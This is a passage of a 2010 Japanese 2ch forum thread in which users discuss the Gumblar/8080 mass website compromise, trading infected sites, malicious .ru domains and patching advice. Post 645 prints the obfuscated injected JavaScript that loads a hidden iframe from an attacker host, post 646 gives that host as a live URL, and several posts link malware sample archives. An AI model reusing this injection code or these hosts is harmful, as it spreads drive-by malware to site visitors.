519 :名無しさん@お腹いっぱい。:2010/01/24(日) 09:59:26
ヲタクなんてそんなもんだ

520 :名無しさん@お腹いっぱい。:2010/01/24(日) 10:04:24
>>511-519
自演乙

521 :名無しさん@お腹いっぱい。:2010/01/24(日) 10:13:30
>>520
ブログ主さん乙

とでも返されればご満足ですか?

522 :名無しさん@お腹いっぱい。:2010/01/24(日) 10:14:13
結局このウィルスの目的は、Web改ざんがしたかったの?
サイトの機密情報を盗みたかったの?

523 :名無しさん@お腹いっぱい。:2010/01/24(日) 10:15:25
botnetの構築

524 :名無しさん@お腹いっぱい。:2010/01/24(日) 10:17:29
>>510
なにこれ、頭にくる文章だな…

525 :名無しさん@お腹いっぱい。:2010/01/24(日) 10:22:01
読みにくいけど情報は正しいよね。
これを例のSQLインジェクション野郎に読ませるべき

526 :名無しさん@お腹いっぱい。:2010/01/24(日) 10:23:47
並列処理させるSETIみたいなもんか

527 :名無しさん@お腹いっぱい。:2010/01/24(日) 10:31:12
>>520
オナニープレイかよ死ね

528 :名無しさん@お腹いっぱい。:2010/01/24(日) 10:33:51
今思ったんだけどトレンドの人はconfickerと間違ったのでは。

529 :名無しさん@お腹いっぱい。:2010/01/24(日) 10:59:36
トレンドマイクロはバカでも課長になれます(キリッ

530 :名無しさん@お腹いっぱい。:2010/01/24(日) 11:18:10
>>527
違うよ。

531 :名無しさん@お腹いっぱい。:2010/01/24(日) 11:27:42
この課長は上がってきた報告書をこねくりまわして発表するのが仕事?
そもそも解析結果を理解できてるとは思えないんですけど
だめじゃん

532 :名無しさん@お腹いっぱい。:2010/01/24(日) 11:28:20
>>502
いっそのこと「最初からSQL云々なんて書いてない!ガンブラにやられて改ざんされたっ、
悔しいビクンビクン!、このように完璧の防御を誇るITProの高性能サーバまでハッキングする
恐ろしいウィルスなのであ〜る!」とか書いとけばいいのに。

.ru:8080コレクション
ampsguide anycitytown authentictype burkewebservices carswebnet easylifedirect
freeprosports funwebmail guidebat genuinehollywood genuinecolors
halfsite homeproair homesaleplus lagworld saletradeonline suesite sugaryhome
superaguide superpropicks theatticsale theaworld thechocolateweb
thelaceweb themobilewindow themobisite viewhomesale webdesktopnet
webdirectbroker webnetenglish webnetloans webnetenglish whosaleonline
worldsouth worldwebworld yourtruemate

きりがないなw 俺も8080ポートをアク禁するだけにしようかな

533 :名無しさん@お腹いっぱい。:2010/01/24(日) 11:45:18
>>532
むしろ、80と443のみ許可で

534 :名無しさん@お腹いっぱい。:2010/01/24(日) 12:04:00
>>515のつづきってあるの?
そこに書いてあるアドレスに書いてあるの?
無関係?

知らないアドレスは踏みたくないんだけど続きがあるなら見たい。

535 :名無しさん@お腹いっぱい。:2010/01/24(日) 12:17:21
無理して踏まなくていいですよ

536 :名無しさん@お腹いっぱい。:2010/01/24(日) 12:19:59
p://yamataiyou●sakura.ne●jp/

ここをFirefoxのview-sourceで表示して、それを、ファイル>名前を付けてページを保存>
ファイルの種類は「Web ページ、HTML のみ」で保存してvirustotalすると
結果: 10/41 (24.4%)になるのだが、俺はhtmlとかにあまり詳しくないので
単純にIframeに反応した誤検出なのかどうかが良く分からない

ttp://www.virustotal.com/jp/analisis/592e666dd50c92ea7fe7c24af8d77b284d49d91c008675001e332a7945652c6f-1264302239

537 :名無しさん@お腹いっぱい。:2010/01/24(日) 12:29:15
>>536
GumblarChecker 2にかけたら、avastがプァーン
HTML:IFrame-GC [Trj]

538 :名無しさん@お腹いっぱい。:2010/01/24(日) 12:50:15
>>536
<iframe name=c10 src='p://●net/.go/check.html' width=262 height=196 style='visibility:hidden'></iframe>
アスキーコード埋め込みでそのあとurlエンコードしたら上記が出てきた
誤検知っぽい

539 :名無しさん@お腹いっぱい。:2010/01/24(日) 12:59:20
>>538
すまん、ドメイン検索するとウイルス配布サイトらしいな
gogo2me●net

540 :536:2010/01/24(日) 13:11:21
回答くれた>>537>>538>>539ありがとう
gogo2me●netでぐぐると結構出てくるね

541 :名無しさん@お腹いっぱい。:2010/01/24(日) 13:58:42
ttp://japan.cnet.com/news/sec/story/0,2000056024,20099577,00.htm
所詮、トレンドマイクロの社員はこの程度ですから・・・

542 :名無しさん@お腹いっぱい。:2010/01/24(日) 14:02:48
>>491
感染後に予防しても意味ないわ
風邪ひいた後にみかん食ったって治らないだろ

543 :名無しさん@お腹いっぱい。:2010/01/24(日) 14:29:13
まっ、神経質になってるのは最初のうちだけだと思うけどね^^;
インフルエンザの時もマスクしてたのは最初だけだったし^^;

まっ基本的(手洗いうがい=最新のパッチ)なことは気にするようになったんじゃないの

無神経な奴は、何があったも気にしないから無理かも^^;

544 :名無しさん@お腹いっぱい。:2010/01/24(日) 14:32:49
>>541
サクサク軽快〜♪ サクサク軽快〜♪ ウイルスバスター!!
販売本数No.1!! 選んだ貴方は・・・

パソコン\(^o^)/オワタ


545 :名無しさん@お腹いっぱい。:2010/01/24(日) 15:02:56
ウイルスバスター(笑)が売れているのは日本ぐらいだろ・・・

546 :名無しさん@お腹いっぱい。:2010/01/24(日) 15:18:26
BCNランキング2009年12月 - セキュリティソフト
ttp://bcnranking.jp/category/subcategory_0019_month.html

547 :名無しさん@お腹いっぱい。:2010/01/24(日) 15:59:45
NTTのやついれてるけど
これはタダならまあいいよね

カスペノートンアバストfセキュレ色々入れてウイルスかかったことなんかないからわからんけど

548 :名無しさん@お腹いっぱい。:2010/01/24(日) 16:07:00
kidsparlour●biz/
www●kidsparlour●net/
まだ対処してませんね


549 :名無しさん@お腹いっぱい。:2010/01/24(日) 16:15:00
古いホームページだから放置するんじゃね

550 :名無しさん@お腹いっぱい。:2010/01/24(日) 16:15:59
cometruestar.ru

551 :名無しさん@お腹いっぱい。:2010/01/24(日) 16:26:33
www●minami-aoyamama●info
こんなとこもまだ


552 :名無しさん@お腹いっぱい。:2010/01/24(日) 16:33:43
今朝VIPで騒いでいたやつ
www●deeplove2●com/index_2.html

553 :名無しさん@お腹いっぱい。:2010/01/24(日) 16:40:10 ?PLT(12031)
ttp://www.virustotal.com/reanalisis.html?dbae7971bd0cc1129354b3ee51e8f36d9856be45826abddacf4c4c8eeb414bbd-1264318686

ttp://www.dotup.org/uploda/www.dotup.org589508.7z.html

新種っぽいの

554 :名無しさん@お腹いっぱい。:2010/01/24(日) 16:59:15 ?PLT(12031)
ttp://www.virustotal.com/analisis/e01e95a4f43d70b65f1ed74f0a293dda7a46d1b21b753360b495fffd875a566a-1264319812
ttp://www.dotup.org/uploda/www.dotup.org589537.7z.html
本体

555 :名無しさん@お腹いっぱい。:2010/01/24(日) 18:21:13 ?PLT(12031)
http://www.dotup.org/uploda/www.dotup.org589732.txt.html
virus
解析して難読化解除・コメント追加したもの

メールの内容を盗んだり色々してるね

556 :名無しさん@お腹いっぱい。:2010/01/24(日) 18:38:15

だけど553と554のファイル内容一緒だ

557 :名無しさん@お腹いっぱい。:2010/01/24(日) 18:48:21 ?PLT(12031)
>>556
あら・・本当だスマン
554はこれね ttp://www.dotup.org/uploda/www.dotup.org589804.txt.html
555にWinampの〜て書いてあるけどあれは間違えてた、正しくはDirectShowの脆弱性を使うものだ

558 :名無しさん@お腹いっぱい。:2010/01/24(日) 19:34:03
どもです。
まあ見てもわけわからんのですが、一般人は現状の対策でおkってことでいいの?

559 :名無しさん@お腹いっぱい。:2010/01/24(日) 19:38:55
おk

560 :名無しさん@お腹いっぱい。:2010/01/24(日) 19:40:54
読んでわかったことは・・
・古いIEだとヤヴァイ、ネット上にある任意のexeファイルを実行可能
・IEはActiveXを実行しないようにしたらすべて回避可能
 ([インターネットオプション]から[セキュリティ]タブの[インターネット]ゾーンのセキュリティレベルを[高]にするだけ)
・IE以外はJavaを切れば回避可能
・Flashは使われてない

561 :名無しさん@お腹いっぱい。:2010/01/24(日) 19:48:08
日々変化しているし1パターンだけじゃなかったはず
今回偶然使ってなかっただけだろうから
例えば他スレで使ってないと断言するのは危ないよ

562 :名無しさん@お腹いっぱい。:2010/01/24(日) 19:53:43
どっちにしても>>6を行っておけば問題ないのは変わらない。

563 :名無しさん@お腹いっぱい。:2010/01/24(日) 19:54:20
まあそうだがこれだけはいえる
”IEは使わない方が良い”

コードの9割がActiveX依存、ActiveXを除けば残るのはJavaのみ

564 :名無しさん@お腹いっぱい。:2010/01/24(日) 19:56:54
>>560
俺も読んでも分からない人なのだけど

> ・古いIEだとヤヴァイ

古いってIE6とかのバージョンっていう意味?

565 :名無しさん@お腹いっぱい。:2010/01/24(日) 20:02:04 ?PLT(12031)
>>564
IE6はまだサポート期間内だからパッチが提供されてるのでアップデートをきちんとしていれば大丈夫、してないなら危険
IE5.5以前は危険

566 :名無しさん@お腹いっぱい。:2010/01/24(日) 20:03:56
>>565
了解。回答ありがとう

567 :名無しさん@お腹いっぱい。:2010/01/24(日) 20:37:13
www●forms-inc●com/nicoletti/

よく分からないんだが、
ここ開こうとしたらNODに止められたんだけど、
ガンブラー感染してるって事?

568 :名無しさん@お腹いっぱい。:2010/01/24(日) 20:40:46
/*Exception*/
感染してる

569 :名無しさん@お腹いっぱい。:2010/01/24(日) 20:48:30
>>568
そうなんだ。ガンブラー怖いな・・
回答thx

570 :sage ◆sage/xLnlI :2010/01/24(日) 20:49:28
明日仮装pcで新しいコード拾ってこなくちゃ

こんどはどんなページに汁かな・・・
もちろん踏ませるのではなく本体を拾ったりしてもらうためにやっているのです



http://www16。atpages。jp/filedl
ガンブラー置き場
たぶんこのアドレスまで安全、進むと危険

571 :sage ◆sage/xLnlI :2010/01/24(日) 20:53:18
下げ忘れすまん

572 :名無しさん@お腹いっぱい。:2010/01/24(日) 21:21:03
海外の串サイト調べてたらいきなりMSEがTrojan:JS/Agent.FA検出した
これはGumblar・・・じゃないか

573 :472:2010/01/24(日) 21:26:11
>>474
そうスか…テンプレの対策はしてるけど、IEはなんかもう
使う気しなくなってもうた。「〜感染してみた」
の記事じっくり読んできたけどIE6がヤバイんですね。

Firefox+NoScriptでも迂闊に許可できないなぁと



574 :名無しさん@お腹いっぱい。:2010/01/24(日) 21:33:25
>>548
下のwhoisにめるぽ
上のwhoisは戻ってきちゃった。。

>>551
さくらにつーほー済み>>492

>>552
whoisからめる

575 :名無しさん@お腹いっぱい。:2010/01/24(日) 21:49:15
>>573
嫌になってmacmini買った
macだから安全ってことはないんだけどね

576 :名無しさん@お腹いっぱい。:2010/01/24(日) 22:10:52
>>567
whoisからめる

577 :名無しさん@お腹いっぱい。:2010/01/24(日) 22:13:19
>>572
Trojan:JS/Agent.FAタイプのGumblarは知らないなあ

578 :名無しさん@お腹いっぱい。:2010/01/24(日) 22:13:59
>>574,576
乙です

579 :名無しさん@お腹いっぱい。:2010/01/24(日) 22:28:13
IE6使ってて感染した人にはセキュリティソフト関係なしに自己責任だろう
8にバージョンアップしない自分が悪い

580 :名無しさん@お腹いっぱい。:2010/01/24(日) 22:29:07
reefcheck●net
NODが反応
JS/TrojanDownloader.Agent.NRL

581 :名無しさん@お腹いっぱい。:2010/01/24(日) 22:37:31
www●oygas●com
trueworldmedia●ru




582 :名無しさん@お腹いっぱい。:2010/01/24(日) 22:41:15
580は /*LGPL*/
581は /*Exception*/

583 :名無しさん@お腹いっぱい。:2010/01/24(日) 22:42:47
>>579
2kの俺はどうなる
変えたくても変えられないんだぞ

584 :名無しさん@お腹いっぱい。:2010/01/24(日) 22:51:32
2000ならFirefoxかOperaを使えばいいじゃないか。
IE6の使用は本当にIEじゃないと駄目なページにとどめるようにすればいい。

585 :名無しさん@お腹いっぱい。:2010/01/24(日) 22:59:08
>>580
whoisからめる

586 :名無しさん@お腹いっぱい。:2010/01/24(日) 23:00:44
>Windows2000
DEPが使えないのが痛すぎ・・・


587 :名無しさん@お腹いっぱい。:2010/01/24(日) 23:05:54
2行入れられてる

psk3●sakura●ne●jp/iv35/
Exception
trueworldmedia●ru

dp44016550●lolipop●jp/seikatuhogo/
Exception
cometruestar●ru



588 :名無しさん@お腹いっぱい。:2010/01/24(日) 23:06:16
DEPをあえて無効にしているおいらに隙はなかった(´・ω・) ス

589 :名無しさん@お腹いっぱい。:2010/01/24(日) 23:08:33
>>583
2K使ってて感染した人にはセキュリティソフト関係なしに自己責任だろう
XPやVISTA、7にバージョンアップしない自分が悪い

590 :名無しさん@お腹いっぱい。:2010/01/24(日) 23:09:57
企業ほどIE6にこだわって入れたままにしてるとこ多いよね。
理由を聞くとセキュリティの都合で〜とか言う。

591 :名無しさん@お腹いっぱい。:2010/01/24(日) 23:10:40
>>584
普段使いは火狐だから大丈夫だと思ってたら、appleのソフトはバージョンアップ時に
強制的にIE立ち上げやがったぞ。
「IEは普段使いじゃないけど普段使いにする?」の画面が出てきて、止められなかった。
appleはIEでも火狐でも許可サイトには入れてなかったのに。

ここから本題。
慌ててIEは最高レベルにしたけど、立ち上げた瞬間に突く脆弱性って、コード実行能力
皆無のIEでもやられる?それとも大丈夫?

これが大丈夫でないなら、IEが完全削除できないWINでは、ゼロデイ突かれたら
終わりってことになる。

592 :名無しさん@お腹いっぱい。:2010/01/24(日) 23:19:00
>>581
whoisからめる

593 :名無しさん@お腹いっぱい。:2010/01/24(日) 23:20:51
からめる って何

594 :名無しさん@お腹いっぱい。:2010/01/24(日) 23:26:10
>>583
うちも2kだけど、2k用のIE6の修正パッチがms updateで配布されてるぞ適応したら?


595 :名無しさん@お腹いっぱい。:2010/01/24(日) 23:35:29
>>593
砂糖を煮詰めたお菓子だよ

596 :名無しさん@お腹いっぱい。:2010/01/24(日) 23:36:41
カラメルのおっちゃ〜ん

597 :名無しさん@お腹いっぱい。:2010/01/24(日) 23:38:03
>>583
2000でIE6でも22日のパッチを当てておけば現状ゼロディなんてないだろ。
Silverlightは2000だとWindows Updateには来ないみたいだからSilverlight公式に行かないと
アップデートできないけど。

というかさ、立ち上げた瞬間に突かれる脆弱性って具体的には何よ?
そんなもの見たことも聞いたこともないんだけど。

>>593
プリンの底にある黒い奴のこと。

598 :名無しさん@お腹いっぱい。:2010/01/24(日) 23:45:49
ttp://labs-uploader.sabaitiba.com/virus/download/1264344166.7z
PASS:virus
やあ (´・ω・`)  久しぶりに本体まとめを更新してみた
ブランクがあるので取りこぼしがあるだろう・・・
もう疲れたよ、パトラッシュ・・・

599 :名無しさん@お腹いっぱい。:2010/01/24(日) 23:53:53
>>598
乙です
ダウン開始直後いきなり反応して接続切られた・・・

600 :名無しさん@お腹いっぱい。:2010/01/24(日) 23:55:43
DEPは向こうにしちゃ駄目なんじゃあ…

601 :名無しさん@お腹いっぱい。:2010/01/24(日) 23:58:55
ttp://labs-uploader.sabaitiba.com/virus/download/1264344947.rar
PASS:virus

パスワードつけてなかった・・・orz

602 :名無しさん@お腹いっぱい。:2010/01/25(月) 00:00:25
>>593
テッちゃんのお友達の二人組

603 :名無しさん@お腹いっぱい。:2010/01/25(月) 00:05:09
sleipnirとIEって互換性あるらしいけど、IEを最新版にしてsleipnirも更新しとけば大丈夫?

604 :名無しさん@お腹いっぱい。:2010/01/25(月) 00:06:12
>>587
さくら
ろりぽ

でじろにめる逝かなかったみたい…

605 :名無しさん@お腹いっぱい。:2010/01/25(月) 00:06:22
いや、中身はIEだし

606 :名無しさん@お腹いっぱい。:2010/01/25(月) 00:08:07
>>603
大丈夫
プニルの開発もIEは最新にしてくれってアナウンスしてた

607 :名無しさん@お腹いっぱい。:2010/01/25(月) 00:12:08
>>606
それならよかった
今IE6から8にアップデートしたとこだ
そしたらjavaがねぇぞゴルァって言われた

608 :名無しさん@お腹いっぱい。:2010/01/25(月) 00:13:50
IE8にしてスレイプニル使ってるわ
感染はしたことない
スクリプトは切ってる

609 :名無しさん@お腹いっぱい。:2010/01/25(月) 00:20:36
IE7で改竄サイトにアクセスしたらJAVAもうごいたみたい。

610 :名無しさん@お腹いっぱい。:2010/01/25(月) 00:24:33
>>597
ルーターがなかったらやられるんじゃないの、立ち上げた瞬間に。

611 :名無しさん@お腹いっぱい。:2010/01/25(月) 00:27:20
>>608
スクリプトは切っておいたほうがいい?

612 :名無しさん@お腹いっぱい。:2010/01/25(月) 00:29:41
>>611
自分は切ってるよ
絵茶の時は絵茶専用に別のブラウザ立ち上げてる

613 :名無しさん@お腹いっぱい。:2010/01/25(月) 00:31:54
絵茶のサイトが感染したら・・・なんと恐ろしい・・・

614 :名無しさん@お腹いっぱい。:2010/01/25(月) 00:39:46
もしもニコニコのランキングページが感染したら…パンデミックにも程がある

615 :名無しさん@お腹いっぱい。:2010/01/25(月) 00:41:14
>>610
なるほど、ルーターなしの環境なあ。それは想定していなかったわ。

616 :名無しさん@お腹いっぱい。:2010/01/25(月) 00:44:28
ルーターなしの人は>>7やっとけば無問題。

617 :名無しさん@お腹いっぱい。:2010/01/25(月) 00:44:39
ニコニコもそうだけど、大手の2chコピペサイトが改ざんされたら被害がすごいだろうな。

618 :名無しさん@お腹いっぱい。:2010/01/25(月) 00:44:53
スクリプトブロックすると動画サイトとかまったく機能しなくなるからなぁ・・・・
信頼してるサイトが感染したらと思うと背筋が寒いぜ

619 :名無しさん@お腹いっぱい。:2010/01/25(月) 00:45:44
2ちゃんねるが!
改竄されたら!

620 :名無しさん@お腹いっぱい。:2010/01/25(月) 00:47:08
M$が!
改竄されたら!

621 :名無しさん@お腹いっぱい。:2010/01/25(月) 00:49:54
リネージュ公式が!
ハンゲー公式が!
官公庁のサイトが!

きりがないな

622 :名無しさん@お腹いっぱい。:2010/01/25(月) 00:52:07
自分でWhiteListに入れてるところが改竄されたらと重うと

623 :名無しさん@お腹いっぱい。:2010/01/25(月) 00:53:08
ルータつけてなくて>>7もやってないと実際どんな被害があるの?
ウイルス仕込まれたりデータごっそり流出?

624 :名無しさん@お腹いっぱい。:2010/01/25(月) 00:53:48
>>621
ネトゲの公式はどっかやられたことあったよ

625 :名無しさん@お腹いっぱい。:2010/01/25(月) 01:00:36
>>623
Gumblar、8080とはちと違う話だが
ttp://trendy.nikkeibp.co.jp/article/col/20050510/112145/

626 :名無しさん@お腹いっぱい。:2010/01/25(月) 01:02:27
懐かしいな、それ

627 :名無しさん@お腹いっぱい。:2010/01/25(月) 01:12:43
どうせ無防備PCの記事だろ・・と思ってクリックしたら予想通りだった

628 :名無しさん@お腹いっぱい。:2010/01/25(月) 01:13:37
ホワイトリストに登録するような中途半端なことするなら、全許可でも同じだと思うけどなあ。

629 :名無しさん@お腹いっぱい。:2010/01/25(月) 01:13:50
javaを有効にするの欄もクリアにしておいたほうがいいのかな?

630 :名無しさん@お腹いっぱい。:2010/01/25(月) 01:14:06
>>590
企業ではIE6のところが多いんじゃないかな。
とくに自社開発システムを使う大企業。
IE6はセキュリティの関係で使わざる得ない。7以上にするとセキュリティが高すぎて
業務システムが動かない。


631 :名無しさん@お腹いっぱい。:2010/01/25(月) 01:17:09
>>515
JREって保護モード対応してるから、Vista/7でIEを保護モード下で動かしてると、
JREの脆弱性を突かれてもシステムには影響ないんだよな

JREバグの検証コードで実験したけど、保護モードで動かしたときは大丈夫だった

632 :名無しさん@お腹いっぱい。:2010/01/25(月) 01:21:02
>>588
不具合の出る特定ソフトは
DEPの例外に登録すればいい気がするが・・・?

633 :名無しさん@お腹いっぱい。:2010/01/25(月) 01:24:55
>>575
普及率が高いものはターゲットになるから、普及率がひくけりゃ低いほど狙われにくい
だから、NetBSDとかOpenBSDとかだれも使ってないOSが安全

634 :名無しさん@お腹いっぱい。:2010/01/25(月) 01:28:16
DEPって標準では重要なシステムファイルのみってなってなかった?
おれは設定変更してすべてのプログラムで有効にしてる

635 :名無しさん@お腹いっぱい。:2010/01/25(月) 01:29:50
>>629
きちんとアップデートしておけば発動することはないんだから有効のままでいい。
たとえ発動しなくても引っかかること自体が嫌なら無効にすればいい。

636 :名無しさん@お腹いっぱい。:2010/01/25(月) 01:30:20
デフォがセキュアでも
ユーザーは穴開けまくる

637 :名無しさん@お腹いっぱい。:2010/01/25(月) 01:38:18
>>555
乙!

> Outlook Expressのメールすべてを…url…に送信する
そこんとこは「CVE-2008-2463」だお

SnapShot Viewerの SnapshotPath と CompressedPath と PrintSnapshotを
ごにょごにょすると、…url…が実行できちゃうみたいね

ついでだから感染したい人向けの環境書いとくよ

・MDAC(CVE-2006-0003)
 SP3より前のWindows XPで2006年4月の月例パッチを未適用に
・SnapShot Viewer(CVE-2008-2463)
 2008年8月の月例パッチ未適用の古いSnapShot Viewerをインストール
・Microsoft Video ActiveX Control(CVE-2008-0015)
 2009年7月のパッチ未適用のDirectShow(Windows)をインストール(デフォルト入ってる?)
・Adobe Reader
 8.1.2以下のVer.8→util.printf(CVE2008-2992)コース
 9.2.0にしる→newPlayer(CVE-2009-4324)コース
 7.1.0より前のVer.7→Collab.collectEmailInfo(CVE-2007-5659)コース
  Acrobat Script(ReaderのJavaScriptな)でバージョン分けしてるから、
  この3パターンのどれかしかだめだお
・JRE(CVE-2008-5353)
6 Update 11より前、5.0 Update 17より前 、1.4.2_19より前のJREのどれか

DEPの有効化やスクリプト無効化は禁止ね
うまく組み合わせないと好みの攻撃が受けられないから注意してね
感染チャンスは1日1回、IP変えないとはじかれちゃうぞ

ほかに足りないものある > all

638 :名無しさん@お腹いっぱい。:2010/01/25(月) 01:42:22
>>555>>637も乙

639 :名無しさん@お腹いっぱい。:2010/01/25(月) 02:10:39
GPLとLGPLとExceptionでPegel

640 :名無しさん@お腹いっぱい。:2010/01/25(月) 02:29:43
>>621
GENOの時には官公庁かなりやられたよ。
ライブカメラ持ちの国交省出先のは、一ヶ月前に見てたからぞっとした。
8080になってからはどうだったか忘れた。

641 :名無しさん@お腹いっぱい。:2010/01/25(月) 02:56:20
陥落したらまずいサイトってのは日本じゃ何をおいてもYahoo! JAPANトップだわな。
恐らく日本語サイトでは1日あたりのページビューが最も多いページ。

あそこがやられると、被害は「甚大」の一言で言い表せるものではなくなるだろう。

Yahoo! JAPANのセキュ担当、頼んだぞ!

642 :名無しさん@お腹いっぱい。:2010/01/25(月) 03:05:01
>>637みたく改めてリスト化されると、ここまで落とさないと感染できない事実に驚くわ。

643 :名無しさん@お腹いっぱい。:2010/01/25(月) 03:10:16
ここまで落とさなくとも感染はするぞw

644 :名無しさん@お腹いっぱい。:2010/01/25(月) 03:14:02
なんなの感染したい人向けって

気持ち悪(´・∀・`)

MじゃなくてGだね(^Д^)

645 :名無しさん@お腹いっぱい。:2010/01/25(月) 03:14:05
W7cw9590 = 'i^@c($)i!o(^-(u^(#!s@.)!!d#a^^u^(&&m&^!#.$#&$(n!!&e^)$$&t(&.!@&!o!c$n^!-&n#(e##-(#!#j!&$!p#@).!(c)^$!o#!^m(e@@&t)r()#u)&^e@s!^)t#()a#r!)^^.@r&u#'.replace(/\!|\$|&|#|\)|@|\(|\^/ig, '');
O1waipyz = document.createElement('if'+'rame');
O1waipyz.style.visibility = 'h!(#i^?d^@@d^^&e&^((n&)#'.replace(/\(|\$|#|&|@|\^|\)|\!/ig, '');
O1waipyz.src = 'http://'+W7cw9590+':8080/index.php?sc';
document.body.appendChild(O1waipyz);

646 :名無しさん@お腹いっぱい。:2010/01/25(月) 03:15:02
http://icio-us.daum.net.ocn-ne-jp.cometruestar.ru:8080/index.php?sc

647 :名無しさん@お腹いっぱい。:2010/01/25(月) 03:31:51
直リンするなよ

648 :名無しさん@お腹いっぱい。:2010/01/25(月) 03:33:23
      ζ
      / ̄ ̄ ̄ ̄\
     /         \
    /\    \  / |
    |||||||   (・)  (・) |
    (6-------◯⌒つ | < バカモ〜ン! また直リンしおって!
    |    _||||||||| |
     \ / \_/ /
       \____/

649 :名無しさん@お腹いっぱい。:2010/01/25(月) 03:44:48
ガンブラーの目的は、ボットの分散ネットワークを作って何がしたいの?

650 :名無しさん@お腹いっぱい。:2010/01/25(月) 04:29:46
オワタ
http://anchorage.2ch.net/test/read.cgi/bizplus/1264115360/

651 :650:2010/01/25(月) 04:31:21
すまん、誤爆した

652 :名無しさん@お腹いっぱい。:2010/01/25(月) 05:59:46
>>649
一気にどこかを攻撃

653 :名無しさん@お腹いっぱい。:2010/01/25(月) 06:25:19
日々新しい亜種が生まれてるのはわかるけど、このスレで既出の奴に感染していないかを調べるにはどうすればいい?

654 :名無しさん@お腹いっぱい。:2010/01/25(月) 06:32:10
>>653の補足:訪れるサイトではなく自分のパソコンの感染

655 :名無しさん@お腹いっぱい。:2010/01/25(月) 06:39:26
まずセーフモードで起動します。

656 :名無しさん@お腹いっぱい。:2010/01/25(月) 06:54:36
次に服を脱ぎます。

657 :名無しさん@お腹いっぱい。:2010/01/25(月) 06:59:42
そして呪文を唱えます。

658 :名無しさん@お腹いっぱい。:2010/01/25(月) 09:00:52
ふぁっく!おまいらそういうのばっかだな!

659 :名無しさん@お腹いっぱい。:2010/01/25(月) 09:29:38
>>7 の
「コントロールパネル」 -> 「管理ツール」 -> 「サービス」 -> 「Remote Procedure Call」を選択する。
「Remote Procedure Call (RPC) エンド ポイント マッパーや各種の RPC サービスを提供します。」

スタートアップの種類が、自動のまま動かせないのですが。
その下のRemote Procedure Call(RPC)Locatorは変えられます。
こちらを切っておけばよいのでしょうか?

660 :名無しさん@お腹いっぱい。:2010/01/25(月) 09:30:29
くっ!ガッツが足りない!

661 :名無しさん@お腹いっぱい。:2010/01/25(月) 11:16:50
http://nextxp.net/archives/2004/11/post_2.html
ここみたらRemote Procedure Callは絶対に自動ってあるけど
Remote Procedure Call(RPC)Locatorは手動ってあるし・・・
どうしよう

662 :名無しさん@お腹いっぱい。:2010/01/25(月) 11:26:07
>>630
そんな"セキュリティにこだわった"環境で、"ネットサーフィン"すんなよ、って話。

663 :名無しさん@お腹いっぱい。:2010/01/25(月) 12:47:34
>>618
スクリプトが直接悪さをしてるわけではないから、基本的な対策はしたうえで
火狐+RequestPolicy(アドオン)でスクリプト有効にして問題ないっぽい。

例えば581は以下のようになる(スクリプトON、RequestPolicy+Flashblock)
ttp://www.dotup.org/uploda/www.dotup.org592430.jpg.html

自分で許可したりホワイトリストに入ってなければ、大元のサイト以外へのアクセスはブロックされる。
で、画像のログの下から2番目のアクセス先があれなわけだw 長文失礼!

664 :名無しさん@お腹いっぱい。:2010/01/25(月) 12:50:24
みすったパス付きだった^^;こっちね↓
ttp://www.dotup.org/uploda/www.dotup.org592437.jpg.html

665 :名無しさん@お腹いっぱい。:2010/01/25(月) 13:01:03
>463
管理人にメール出した後も変化無しだったんで,
今朝AAA!CAFEに連絡したら,やっと改竄箇所が削除されてました。
トップページで告知してくれたらいいんだけど。

666 :名無しさん@お腹いっぱい。:2010/01/25(月) 13:03:13
>>567
連絡してやったら、Web製作費がリーズナブルだったから発注したそうだ

「お知らせ下さってありがとうございます お礼に家具をお安くいたします」とのことだったw

667 :名無しさん@お腹いっぱい。:2010/01/25(月) 13:09:51
金曜日に感染しました。

やたら、TM6.tmpだの、TM1A.tmpだの
通信をしたいとFWのポップアップがでるから
おかしいと思ってたら・・・。

TM6.tmp類の削除とレジストリからも消したのだが、
siszyd32.exeが見つからない。
と思ってたら、wwwpos32.exe でした。

FFFTPに何個か設定があったのですが、
今のところWebの改竄は確認できてません。、
TM6.tmpの通信をブロックしてたので、
情報は漏れなかったのかも?







668 :名無しさん@お腹いっぱい。:2010/01/25(月) 13:17:26
…と楽観視していてやられたサイトは沢山あるんじゃね。
htmlだけ見てたらjsやられてたとか単純に後回しにされてるとか。

669 :名無しさん@お腹いっぱい。:2010/01/25(月) 13:49:48
>>659
>>661
素人はRPCを絶対いじるな
ttp://blog.goo.ne.jp/rimotyu/e/4572b0958f2f6881a01be32de9d01ebd
http://soudan1.biglobe.ne.jp/qa3068747.html
ttp://weblabo.griffonworks.net/dorlog/2nddorcom/windows/26028.html

670 :名無しさん@お腹いっぱい。:2010/01/25(月) 14:12:21
>>480
いまは感染サイトは閉鎖されて、ブログ書き変わっているんだけど、

> 現在、
> 「カーポスト」「横浜陸事の代書屋」のホームページを
> 閉鎖しております。

> また、対策方法として下記の手続きを施します。
> 当事務所ホームページにより感染してしまわれた方には
> 大変ご迷惑をおかけいたしまして誠に申し訳ございません。
> FTPソフトを利用なさらない方には実害はないかも
> しれませんが、対応方法等を記載致します。

実害ないんだっけ???

671 :名無しさん@お腹いっぱい。:2010/01/25(月) 14:12:45
>>663
基本的な対策をしていればRequestPolicyなんて不要だろ。
そもそもログが不要ならRequestPolicyと同じことはFirefoxの本体機能だけで可能。

672 :名無しさん@お腹いっぱい。:2010/01/25(月) 14:16:16
>>669
マジで。今日いじったばっかりだったよ。
素人判断で迂闊に手出しちゃ駄目だなぁ。

673 :名無しさん@お腹いっぱい。:2010/01/25(月) 14:19:58
>>672
よかったねぇ、先に戻し方がわかって。

674 :名無しさん@お腹いっぱい。:2010/01/25(月) 14:31:44
RequestPolicyはガチガチにすると閲覧するときレイアウトくずすからなー
それにもっさり重くなるし


675 :名無しさん@お腹いっぱい。:2010/01/25(月) 14:36:57
>>672
再起動後に症状が出るはずだから、今のうちに必要な部分はテキスト保存しておけ
セキュリティソフトも立ちあがれなくなり、最悪ネットに接続することすらやばくなる
>>7コピペは次スレからどう扱うべきかね

676 :名無しさん@お腹いっぱい。:2010/01/25(月) 14:49:11
最悪OSリカバリーでも泣かない!超自己責任でやりたきゃやれ!
とかテンプレの頭とケツに行間空けて書いておくとか

677 :名無しさん@お腹いっぱい。:2010/01/25(月) 14:54:43
>>670

> 293 :名無しさん@お腹いっぱい。:2010/01/22(金) 02:08:43
> 手持ちの*.ru:8080な奴をISPとGoogleさんちのDNSで試したけど
> 全部IPが引けなくなってしまった

GNU GLP/LGPLのドメインが一掃されたみたいだから
21日までビンゴ、22日から実害なし…かな

678 :名無しさん@お腹いっぱい。:2010/01/25(月) 15:18:53
>>675
>>7 は統合セキュリティソフトやFirewallで閉じてるだろうから「いらない」に一票
正直セキュリティソフトも入れてないやつまで面倒見切れん

